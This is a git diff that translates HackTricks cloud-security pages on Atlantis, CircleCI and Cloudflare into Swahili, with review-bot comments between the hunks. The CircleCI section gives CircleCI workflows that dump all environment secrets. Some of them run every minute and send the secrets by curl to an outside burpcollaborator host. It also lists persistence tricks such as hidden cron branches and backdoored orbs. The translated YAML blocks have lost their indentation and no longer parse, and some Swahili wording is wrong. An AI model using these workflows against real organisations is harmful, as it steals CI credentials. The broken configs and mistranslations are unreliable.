-Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
+Atlantis inapaswa kuendeshwa na Webhook secrets zilizowekwa kupitia mabadiliko ya mazingira ya `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET`. Hata na bendera ya `--repo-allowlist` iliyowekwa, bila webhook secret, washambuliaji wanaweza kufanya maombi kwa Atlantis wakijifanya kama repo ambayo imeorodheshwa. Webhook secrets zinahakikisha kwamba maombi ya webhook yanatoka kwa mtoa huduma wako wa VCS (GitHub au GitLab).
-If you are using Azure DevOps, instead of webhook secrets add a basic username and password.
+Ikiwa unatumia Azure DevOps, badala ya webhook secrets ongeza jina la mtumiaji wa msingi na nenosiri.
#### Azure DevOps Basic Authentication
-Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.
+Azure DevOps inasaidia kutuma kichwa cha uthibitishaji wa msingi katika matukio yote ya webhook. Hii inahitaji kutumia URL ya HTTPS kwa eneo lako la webhook.
#### SSL/HTTPS
-If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.
+Ikiwa unatumia webhook secrets lakini trafiki yako iko juu ya HTTP basi webhook secrets zinaweza kuibiwa. Wezesha SSL/HTTPS kwa kutumia bendera za `--ssl-cert-file` na `--ssl-key-file`.
-#### Enable Authentication on Atlantis Web Server
+#### Wezesha Uthibitishaji kwenye Seva ya Mtandao ya Atlantis
-It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags.
+Inashauriwa sana kuwezesha uthibitishaji katika huduma ya wavuti. Wezesha BasicAuth kwa kutumia `--web-basic-auth=true` na weka jina la mtumiaji na nenosiri kwa kutumia bendera za `--web-username=yourUsername` na `--web-password=yourPassword`.
-You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.
+Unaweza pia kupitisha hizi kama mabadiliko ya mazingira `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` na `ATLANTIS_WEB_PASSWORD=yourPassword`.
### References
@@ -386,7 +370,3 @@ You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true`
- [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html)
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
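Review bot: The YAML example for bypassing apply requirements is broken by the indentation change: with `+- id: /.*/` and `+apply_requirements: []` both at column 0, `apply_requirements` is no longer a key of the repo entry but a top-level sibling of `repos`, so the snippet no longer shows the override the paragraph describes. Restore the two-space indentation under `- id:`. In the Mitigations text, "huwezi kuweka `--allow-fork-prs`" says "you cannot set" where the original says "you shouldn't set", and "(inarejelea kuwa si kweli)" translates the literal default value; keep `false` as-is. "Bitbucket Cloud haifai **webhook secrets**" reads as "is not suitable for" rather than "does not support". The English possessive is left dangling in `+3. Badilisha [mipangilio ya repo upande wa seva](...)'s hatua ya `plan``; drop the `'s`. The "Mfano:" item under the tfstate path lost its nesting, and the context line `.png>)` is pre-existing residue of a broken image link that is worth repairing while this section is being touched.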
diff --git a/src/pentesting-ci-cd/circleci-security.md b/src/pentesting-ci-cd/circleci-security.md
index 8b8a1fea1..fdb61bab0 100644
--- a/src/pentesting-ci-cd/circleci-security.md
+++ b/src/pentesting-ci-cd/circleci-security.md
@@ -4,256 +4,232 @@
### Basic Information
-[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example.
+[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) ni jukwaa la Uunganishaji Endelevu ambapo unaweza **kufafanua mifano** inayoonyesha unachotaka ifanye na baadhi ya msimbo na lini ifanye hivyo. Kwa njia hii unaweza **kujiandaa kwa majaribio** au **kupeleka** moja kwa moja **kutoka kwa tawi kuu la repo yako** kwa mfano.
### Permissions
-**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\
-In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...).
+**CircleCI** **inapata ruhusa** kutoka github na bitbucket zinazohusiana na **akaunti** inayojiandikisha.\
+Katika majaribio yangu nilikagua kwamba kadri unavyo kuwa na **ruhusa za kuandika juu ya repo katika github**, utaweza **kusimamia mipangilio ya mradi wake katika CircleCI** (weka funguo mpya za ssh, pata funguo za api za mradi, tengeneza matawi mapya na mipangilio mipya ya CircleCI...).
-However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**.
+Hata hivyo, unahitaji kuwa **admin wa repo** ili **kubadilisha repo kuwa mradi wa CircleCI**.
### Env Variables & Secrets
-According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow.
+Kulingana na [**nyaraka**](https://circleci.com/docs/2.0/env-vars/) kuna njia tofauti za **kupanua thamani katika mabadiliko ya mazingira** ndani ya mchakato.
#### Built-in env variables
-Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
+Kila kontena linalotumiwa na CircleCI litakuwa na [**mabadiliko maalum ya mazingira yaliyofafanuliwa katika nyaraka**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) kama `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` au `CIRCLE_USERNAME`.
#### Clear text
-You can declare them in clear text inside a **command**:
-
+Unaweza kuyatangaza kwa maandiko wazi ndani ya **amri**:
```yaml
- run:
- name: "set and echo"
- command: |
- SECRET="A secret"
- echo $SECRET
+name: "set and echo"
+command: |
+SECRET="A secret"
+echo $SECRET
```
-
-You can declare them in clear text inside the **run environment**:
-
+Unaweza kutangaza hizo kwa maandiko wazi ndani ya **run environment**:
```yaml
- run:
- name: "set and echo"
- command: echo $SECRET
- environment:
- SECRET: A secret
+name: "set and echo"
+command: echo $SECRET
+environment:
+SECRET: A secret
```
-
-You can declare them in clear text inside the **build-job environment**:
-
+Unaweza kutangaza hizo kwa maandiko wazi ndani ya **build-job environment**:
```yaml
jobs:
- build-job:
- docker:
- - image: cimg/base:2020.01
- environment:
- SECRET: A secret
+build-job:
+docker:
+- image: cimg/base:2020.01
+environment:
+SECRET: A secret
```
-
-You can declare them in clear text inside the **environment of a container**:
-
+Unaweza kutangaza hizo kwa maandiko wazi ndani ya **mazingira ya kontena**:
```yaml
jobs:
- build-job:
- docker:
- - image: cimg/base:2020.01
- environment:
- SECRET: A secret
+build-job:
+docker:
+- image: cimg/base:2020.01
+environment:
+SECRET: A secret
```
+#### Siri za Mradi
-#### Project Secrets
-
-These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\
-You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_
+Hizi ni **siri** ambazo zitakuwa **zinapatikana** tu na **mradi** (kwa **tawi lolote**).\
+Unaweza kuziona **zimeelezwa katika** _https://app.circleci.com/settings/project/github/\/\/environment-variables_
.png>)
> [!CAUTION]
-> The "**Import Variables**" functionality allows to **import variables from other projects** to this one.
+> Kazi ya "**Kuagiza Vigezo**" inaruhusu **kuagiza vigezo kutoka miradi mingine** hadi hii.
-#### Context Secrets
+#### Siri za Muktadha
-These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here:
+Hizi ni siri ambazo ni **za shirika lote**. Kwa **kawaida kila repo** itakuwa na uwezo wa **kupata siri yoyote** iliyohifadhiwa hapa:
.png>)
> [!TIP]
-> However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\
-> This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people.
+> Hata hivyo, kumbuka kwamba kundi tofauti (badala ya Wanachama Wote) linaweza **kuchaguliwa ili kutoa ufaccessi wa siri kwa watu maalum**.\
+> Hii kwa sasa ni moja ya njia bora za **kuongeza usalama wa siri**, ili kuto ruhusu kila mtu kuzipata bali watu wachache tu.
-### Attacks
+### Mashambulizi
-#### Search Clear Text Secrets
+#### Tafuta Siri za Maandishi Safi
-If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there.
+Ikiwa una **ufaccessi kwa VCS** (kama github) angalia faili `.circleci/config.yml` ya **kila repo kwenye kila tawi** na **tafuta** siri za **maandishi safi** zinazoweza kuwa zimehifadhiwa humo.
-#### Secret Env Vars & Context enumeration
+#### Siri za Env Vars & Uainishaji wa Muktadha
-Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_.
+Ukikagua msimbo unaweza kupata **majina yote ya siri** yanayotumika katika kila faili `.circleci/config.yml`. Unaweza pia kupata **majina ya muktadha** kutoka kwa hizo faili au kuangalia kwenye console ya wavuti: _https://app.circleci.com/settings/organization/github/\/contexts_.
-#### Exfiltrate Project secrets
+#### Fanya Uhamishaji wa Siri za Mradi
> [!WARNING]
-> In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_).
+> Ili **kuhamasisha ZOTE** siri za mradi na muktadha **UNAHITAJI** tu kuwa na **UFACCESSI WA KUANDIKA** kwa **repo 1 tu** katika shirika lote la github (_na akaunti yako inapaswa kuwa na ufaccessi kwa muktadha lakini kwa kawaida kila mtu anaweza kupata kila muktadha_).
> [!CAUTION]
-> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**.
-
-All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**:
+> Kazi ya "**Kuagiza Vigezo**" inaruhusu **kuagiza vigezo kutoka miradi mingine** hadi hii. Hivyo, mshambuliaji anaweza **kuagiza vigezo vyote vya mradi kutoka kwa repos zote** na kisha **kuhamasisha zote pamoja**.
+Siri zote za mradi kila wakati zimewekwa katika env ya kazi, hivyo tu kuita env na kuificha kwa base64 itahamisha siri katika **console ya logi ya wavuti ya workflows**:
```yaml
version: 2.1
jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "env | base64"
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- run:
+name: "Exfil env"
+command: "env | base64"
workflows:
- exfil-env-workflow:
- jobs:
- - exfil-env
+exfil-env-workflow:
+jobs:
+- exfil-env
```
-
-If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
-
+Ikiwa **huna ufikiaji wa console ya wavuti** lakini una **ufikiaji wa repo** na unajua kuwa CircleCI inatumika, unaweza tu **kuunda workflow** ambayo inachochewa kila dakika na ambayo **inasafirisha siri kwa anwani ya nje**:
```yaml
version: 2.1
jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- run:
+name: "Exfil env"
+command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
workflows:
- exfil-env-workflow:
- triggers:
- - schedule:
- cron: "* * * * *"
- filters:
- branches:
- only:
- - circleci-project-setup
- jobs:
- - exfil-env
+exfil-env-workflow:
+triggers:
+- schedule:
+cron: "* * * * *"
+filters:
+branches:
+only:
+- circleci-project-setup
+jobs:
+- exfil-env
```
-
#### Exfiltrate Context Secrets
-You need to **specify the context name** (this will also exfiltrate the project secrets):
-
+Unahitaji **kueleza jina la muktadha** (hii pia itatoa siri za mradi):
```yaml
version: 2.1
jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "env | base64"
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- run:
+name: "Exfil env"
+command: "env | base64"
workflows:
- exfil-env-workflow:
- jobs:
- - exfil-env:
- context: Test-Context
+exfil-env-workflow:
+jobs:
+- exfil-env:
+context: Test-Context
```
-
-If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
-
+Ikiwa **huna ufikiaji wa web console** lakini una **ufikiaji wa repo** na unajua kuwa CircleCI inatumika, unaweza tu **kubadilisha workflow** ambayo **inasababishwa kila dakika** na ambayo **inasafirisha siri kwa anwani ya nje**:
```yaml
version: 2.1
jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - run:
- name: "Exfil env"
- command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- run:
+name: "Exfil env"
+command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
workflows:
- exfil-env-workflow:
- triggers:
- - schedule:
- cron: "* * * * *"
- filters:
- branches:
- only:
- - circleci-project-setup
- jobs:
- - exfil-env:
- context: Test-Context
+exfil-env-workflow:
+triggers:
+- schedule:
+cron: "* * * * *"
+filters:
+branches:
+only:
+- circleci-project-setup
+jobs:
+- exfil-env:
+context: Test-Context
```
-
> [!WARNING]
-> Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**.
+> Kuunda tu `.circleci/config.yml` mpya katika repo **siyo ya kutosha kuanzisha ujenzi wa circleci**. Unahitaji **kuifanya kuwa mradi katika console ya circleci**.
-#### Escape to Cloud
+#### Kutoroka kwa Wingu
-**CircleCI** gives you the option to run **your builds in their machines or in your own**.\
-By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**.
-
-Notice that in the previous examples it was launched everything inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions):
+**CircleCI** inakupa chaguo la kuendesha **ujenzi wako katika mashine zao au katika zako mwenyewe**.\
+Kwa kawaida, mashine zao ziko katika GCP, na awali huwezi kupata chochote muhimu. Hata hivyo, ikiwa mwathirika anatekeleza kazi katika **mashine zao wenyewe (labda, katika mazingira ya wingu)**, unaweza kupata **nukta ya metadata ya wingu yenye habari za kuvutia**.
+Kumbuka kwamba katika mifano ya awali kila kitu kilizinduliwa ndani ya kontena la docker, lakini unaweza pia **kuomba kuzindua mashine ya VM** (ambayo inaweza kuwa na ruhusa tofauti za wingu):
```yaml
jobs:
- exfil-env:
- #docker:
- # - image: cimg/base:stable
- machine:
- image: ubuntu-2004:current
+exfil-env:
+#docker:
+# - image: cimg/base:stable
+machine:
+image: ubuntu-2004:current
```
-
-Or even a docker container with access to a remote docker service:
-
+Au hata kontena la docker lenye ufikiaji wa huduma ya docker ya mbali:
```yaml
jobs:
- exfil-env:
- docker:
- - image: cimg/base:stable
- steps:
- - checkout
- - setup_remote_docker:
- version: 19.03.13
+exfil-env:
+docker:
+- image: cimg/base:stable
+steps:
+- checkout
+- setup_remote_docker:
+version: 19.03.13
```
-
#### Persistence
-- It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access.
- - _https://app.circleci.com/settings/user/tokens_
-- It's possible to **create projects tokens** to access the project with the permissions given to the token.
- - _https://app.circleci.com/settings/project/github/\/\/api_
-- It's possible to **add SSH keys** to the projects.
- - _https://app.circleci.com/settings/project/github/\/\/ssh_
-- It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday.
- - Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday.
-- If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor**
-- You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value
+- Inawezekana **kuunda** **tokens za mtumiaji katika CircleCI** ili kufikia API endpoints kwa ufikiaji wa watumiaji.
+- _https://app.circleci.com/settings/user/tokens_
+- Inawezekana **kuunda tokens za miradi** ili kufikia mradi kwa ruhusa zilizotolewa kwa token.
+- _https://app.circleci.com/settings/project/github/\/\/api_
+- Inawezekana **kuongeza funguo za SSH** kwenye miradi.
+- _https://app.circleci.com/settings/project/github/\/\/ssh_
+- Inawezekana **kuunda kazi ya cron katika tawi lililofichwa** katika mradi usiotarajiwa ambao unatoa **leak** ya **context env** vars kila siku.
+- Au hata kuunda katika tawi / kubadilisha kazi inayojulikana ambayo itatoa **leak** ya muktadha wote na **siri za miradi** kila siku.
+- Ikiwa wewe ni mmiliki wa github unaweza **kuruhusu orbs zisizothibitishwa** na kuziunda katika kazi kama **backdoor**
+- Unaweza kupata **udhaifu wa kuingiza amri** katika kazi fulani na **kuingiza amri** kupitia **siri** kwa kubadilisha thamani yake
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
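Review bot: all ten fenced YAML blocks in this hunk lose their indentation, and the first one also loses its `- run:` list item (`+name: "set and echo"` / `+command: |` / `+SECRET="A secret"` replace the indented `- run:` step), so none of the config snippets parse any more: `jobs:` and `exfil-env:` become sibling top-level keys, `name:`/`command:` are no longer children of the `run` step, and the `SECRET="A secret"` line is no longer inside the `|` block scalar. Fenced code should be carried over byte-for-byte from the English source; restore the original indentation in every block. The same flattening hits the Persistence list, where the `- _https://app.circleci.com/settings/user/tokens_` style URL bullets are now top-level siblings instead of children of the item they belong to. Smaller points: headings are translated inconsistently (`#### Siri za Mradi` and `### Mashambulizi` alongside `#### Exfiltrate Context Secrets` and `#### Persistence` left in English); `ufaccessi` is not a Swahili word (the hunk itself uses `ufikiaji` further down); `kuhamasisha` in the WARNING means "mobilize", whereas `kuhamisha` is the intended "transfer/exfiltrate"; and the blank lines that separated prose from the fences were dropped. The `.png>)` residue on the two unchanged image lines predates this change but could be repaired in the same pass.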
diff --git a/src/pentesting-ci-cd/cloudflare-security/README.md b/src/pentesting-ci-cd/cloudflare-security/README.md
index 77d2c2c50..5cf035f7d 100644
--- a/src/pentesting-ci-cd/cloudflare-security/README.md
+++ b/src/pentesting-ci-cd/cloudflare-security/README.md
@@ -2,13 +2,13 @@
{{#include ../../banners/hacktricks-training.md}}
-In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
+Katika akaunti ya Cloudflare kuna **mipangilio na huduma za jumla** ambazo zinaweza kuanzishwa. Katika ukurasa huu tutachambua **mipangilio inayohusiana na usalama ya kila sehemu:**
## Websites
-Review each with:
+Kagua kila moja na:
{{#ref}}
cloudflare-domains.md
@@ -16,9 +16,9 @@ cloudflare-domains.md
### Domain Registration
-- [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain.
+- [ ] Katika **`Transfer Domains`** hakikisha kuwa haiwezekani kuhamasisha domain yoyote.
-Review each with:
+Kagua kila moja na:
{{#ref}}
cloudflare-domains.md
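Review bot: `kuhamasisha domain yoyote` in the Transfer Domains item reads as "mobilize/encourage any domain"; the verb for "transfer" is `kuhamisha`, so the line should be `haiwezekani kuhamisha domain yoyote`.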
@@ -26,39 +26,39 @@ cloudflare-domains.md
## Analytics
-_I couldn't find anything to check for a config security review._
+_Sikuweza kupata chochote cha kukagua kwa ajili ya ukaguzi wa usalama wa mipangilio._
## Pages
-On each Cloudflare's page:
+Katika kila ukurasa wa Cloudflare:
-- [ ] Check for **sensitive information** in the **`Build log`**.
-- [ ] Check for **sensitive information** in the **Github repository** assigned to the pages.
-- [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/).
-- [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any).
-- [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code**
-- [ ] In the details of each page `//pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**.
-- [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page.
+- [ ] Kagua kwa **taarifa nyeti** katika **`Build log`**.
+- [ ] Kagua kwa **taarifa nyeti** katika **Github repository** iliyotengwa kwa ajili ya kurasa.
+- [ ] Kagua kwa uwezekano wa kuathiriwa kwa github repo kupitia **workflow command injection** au kuathiriwa kwa `pull_request_target`. Maelezo zaidi katika [**Github Security page**](../github-security/).
+- [ ] Kagua kwa **kazi zenye udhaifu** katika saraka ya `/fuctions` (ikiwa ipo), kagua **redirects** katika faili ya `_redirects` (ikiwa ipo) na **vichwa vilivyopangwa vibaya** katika faili ya `_headers` (ikiwa ipo).
+- [ ] Kagua kwa **udhaifu** katika **ukurasa wa wavuti** kupitia **blackbox** au **whitebox** ikiwa unaweza **kufikia msimbo**
+- [ ] Katika maelezo ya kila ukurasa `//pages/view/blocklist/settings/functions`. Kagua kwa **taarifa nyeti** katika **`Environment variables`**.
+- [ ] Katika ukurasa wa maelezo kagua pia **amri ya kujenga** na **saraka ya mzizi** kwa ajili ya **uwezekano wa kuingilia** ili kuathiri ukurasa.
## **Workers**
-On each Cloudflare's worker check:
+Katika kila mfanyakazi wa Cloudflare kagua:
-- [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker?
-- [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information**
-- [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input)
- - Check for SSRFs returning the indicated page that you can control
- - Check XSSs executing JS inside a svg image
- - It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input.
+- [ ] Vichocheo: Nini kinachofanya mfanyakazi kuanzishwa? Je, **mtumiaji anaweza kutuma data** ambayo itatumika na mfanyakazi?
+- [ ] Katika **`Settings`**, kagua kwa **`Variables`** zinazokuwa na **taarifa nyeti**
+- [ ] Kagua **msimbo wa mfanyakazi** na tafuta kwa **udhaifu** (hasa katika maeneo ambapo mtumiaji anaweza kudhibiti ingizo)
+- Kagua kwa SSRFs zinazorejesha ukurasa ulioonyeshwa ambao unaweza kudhibiti
+- Kagua XSSs zinazotekeleza JS ndani ya picha ya svg
+- Inawezekana kwamba mfanyakazi anashirikiana na huduma nyingine za ndani. Kwa mfano, mfanyakazi anaweza kuingiliana na R2 bucket inayohifadhi taarifa ndani yake iliyopatikana kutoka kwa ingizo. Katika kesi hiyo, itahitajika kukagua ni uwezo gani mfanyakazi ana juu ya R2 bucket na jinsi gani inaweza kutumika vibaya kutokana na ingizo la mtumiaji.
> [!WARNING]
-> Note that by default a **Worker is given a URL** such as `..workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it.
+> Kumbuka kwamba kwa kawaida **Mfanyakazi anapewa URL** kama `..workers.dev`. Mtumiaji anaweza kuipanga kuwa **subdomain** lakini unaweza kila wakati kuipata kwa hiyo **URL ya asili** ikiwa unajua.
## R2
-On each R2 bucket check:
+Katika kila R2 bucket kagua:
-- [ ] Configure **CORS Policy**.
+- [ ] Panga **CORS Policy**.
## Stream
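Review bot: the three sub-bullets under the worker-code item (`- Kagua kwa SSRFs...`, `- Kagua XSSs...`, `- Inawezekana kwamba mfanyakazi...`) lost their leading indentation and are now top-level list entries rather than children of that checklist item, which changes the structure of the review checklist; restore the indentation. "Worker" is a Cloudflare product name and should stay untranslated rather than become `mfanyakazi` ("employee"), consistent with `R2 bucket`, `Build log` and `Environment variables`, which the hunk keeps as-is. The `/fuctions` typo (Pages functions live in `/functions`) is carried over from the source line; since the line is being rewritten anyway, correct it here.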
@@ -70,8 +70,8 @@ TODO
## Security Center
-- [ ] If possible, run a **`Security Insights`** **scan** and an **`Infrastructure`** **scan**, as they will **highlight** interesting information **security** wise.
-- [ ] Just **check this information** for security misconfigurations and interesting info
+- [ ] Ikiwezekana,endesha **`Security Insights`** **scan** na **`Infrastructure`** **scan**, kwani zitatoa **maelezo** ya kuvutia kuhusu **usalama**.
+- [ ] Kagua tu **taarifa hii** kwa ajili ya mipangilio mibaya ya usalama na taarifa za kuvutia
## Turnstile
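Review bot: missing space after the comma in `Ikiwezekana,endesha` on the Security Center line.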
@@ -86,53 +86,49 @@ cloudflare-zero-trust-network.md
## Bulk Redirects
> [!NOTE]
-> Unlike [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) are essentially static ā they do **not support any string replacement** operations or regular expressions. However, you can configure URL redirect parameters that affect their URL matching behavior and their runtime behavior.
+> Tofauti na [Dynamic Redirects](https://developers.cloudflare.com/rules/url-forwarding/dynamic-redirects/), [**Bulk Redirects**](https://developers.cloudflare.com/rules/url-forwarding/bulk-redirects/) kimsingi ni za kudumu ā hazisaidii **operesheni za kubadilisha nyuzi** au matumizi ya kawaida. Hata hivyo, unaweza kupanga vigezo vya URL redirect vinavyoathiri tabia yao ya ulinganifu wa URL na tabia yao ya wakati wa kutekeleza.
-- [ ] Check that the **expressions** and **requirements** for redirects **make sense**.
-- [ ] Check also for **sensitive hidden endpoints** that you contain interesting info.
+- [ ] Kagua kwamba **expressions** na **requirements** za redirects **zina maana**.
+- [ ] Kagua pia kwa **mipangilio ya siri iliyofichwa** ambayo ina taarifa za kuvutia.
## Notifications
-- [ ] Check the **notifications.** These notifications are recommended for security:
- - `Usage Based Billing`
- - `HTTP DDoS Attack Alert`
- - `Layer 3/4 DDoS Attack Alert`
- - `Advanced HTTP DDoS Attack Alert`
- - `Advanced Layer 3/4 DDoS Attack Alert`
- - `Flow-based Monitoring: Volumetric Attack`
- - `Route Leak Detection Alert`
- - `Access mTLS Certificate Expiration Alert`
- - `SSL for SaaS Custom Hostnames Alert`
- - `Universal SSL Alert`
- - `Script Monitor New Code Change Detection Alert`
- - `Script Monitor New Domain Alert`
- - `Script Monitor New Malicious Domain Alert`
- - `Script Monitor New Malicious Script Alert`
- - `Script Monitor New Malicious URL Alert`
- - `Script Monitor New Scripts Alert`
- - `Script Monitor New Script Exceeds Max URL Length Alert`
- - `Advanced Security Events Alert`
- - `Security Events Alert`
-- [ ] Check all the **destinations**, as there could be **sensitive info** (basic http auth) in webhook urls. Make also sure webhook urls use **HTTPS**
- - [ ] As extra check, you could try to **impersonate a cloudflare notification** to a third party, maybe you can somehow **inject something dangerous**
+- [ ] Kagua **notifications.** Taarifa hizi zinapendekezwa kwa usalama:
+- `Usage Based Billing`
+- `HTTP DDoS Attack Alert`
+- `Layer 3/4 DDoS Attack Alert`
+- `Advanced HTTP DDoS Attack Alert`
+- `Advanced Layer 3/4 DDoS Attack Alert`
+- `Flow-based Monitoring: Volumetric Attack`
+- `Route Leak Detection Alert`
+- `Access mTLS Certificate Expiration Alert`
+- `SSL for SaaS Custom Hostnames Alert`
+- `Universal SSL Alert`
+- `Script Monitor New Code Change Detection Alert`
+- `Script Monitor New Domain Alert`
+- `Script Monitor New Malicious Domain Alert`
+- `Script Monitor New Malicious Script Alert`
+- `Script Monitor New Malicious URL Alert`
+- `Script Monitor New Scripts Alert`
+- `Script Monitor New Script Exceeds Max URL Length Alert`
+- `Advanced Security Events Alert`
+- `Security Events Alert`
+- [ ] Kagua zote **destinations**, kwani kunaweza kuwa na **taarifa nyeti** (basic http auth) katika urls za webhook. Hakikisha pia urls za webhook zinatumia **HTTPS**
+- [ ] Kama ukaguzi wa ziada, unaweza kujaribu **kujifanya kuwa notification ya cloudflare** kwa upande wa tatu, labda unaweza kwa namna fulani **kuingiza kitu hatari**
## Manage Account
-- [ ] It's possible to see the **last 4 digits of the credit card**, **expiration** time and **billing address** in **`Billing` -> `Payment info`**.
-- [ ] It's possible to see the **plan type** used in the account in **`Billing` -> `Subscriptions`**.
-- [ ] In **`Members`** it's possible to see all the members of the account and their **role**. Note that if the plan type isn't Enterprise, only 2 roles exist: Administrator and Super Administrator. But if the used **plan is Enterprise**, [**more roles**](https://developers.cloudflare.com/fundamentals/account-and-billing/account-setup/account-roles/) can be used to follow the least privilege principle.
- - Therefore, whenever possible is **recommended** to use the **Enterprise plan**.
-- [ ] In Members it's possible to check which **members** has **2FA enabled**. **Every** user should have it enabled.
+- [ ] Inawezekana kuona **nambari 4 za mwisho za kadi ya mkopo**, **muda wa kumalizika** na **anwani ya bili** katika **`Billing` -> `Payment info`**.
+- [ ] Inawezekana kuona **aina ya mpango** inayotumika katika akaunti katika **`Billing` -> `Subscriptions`**.
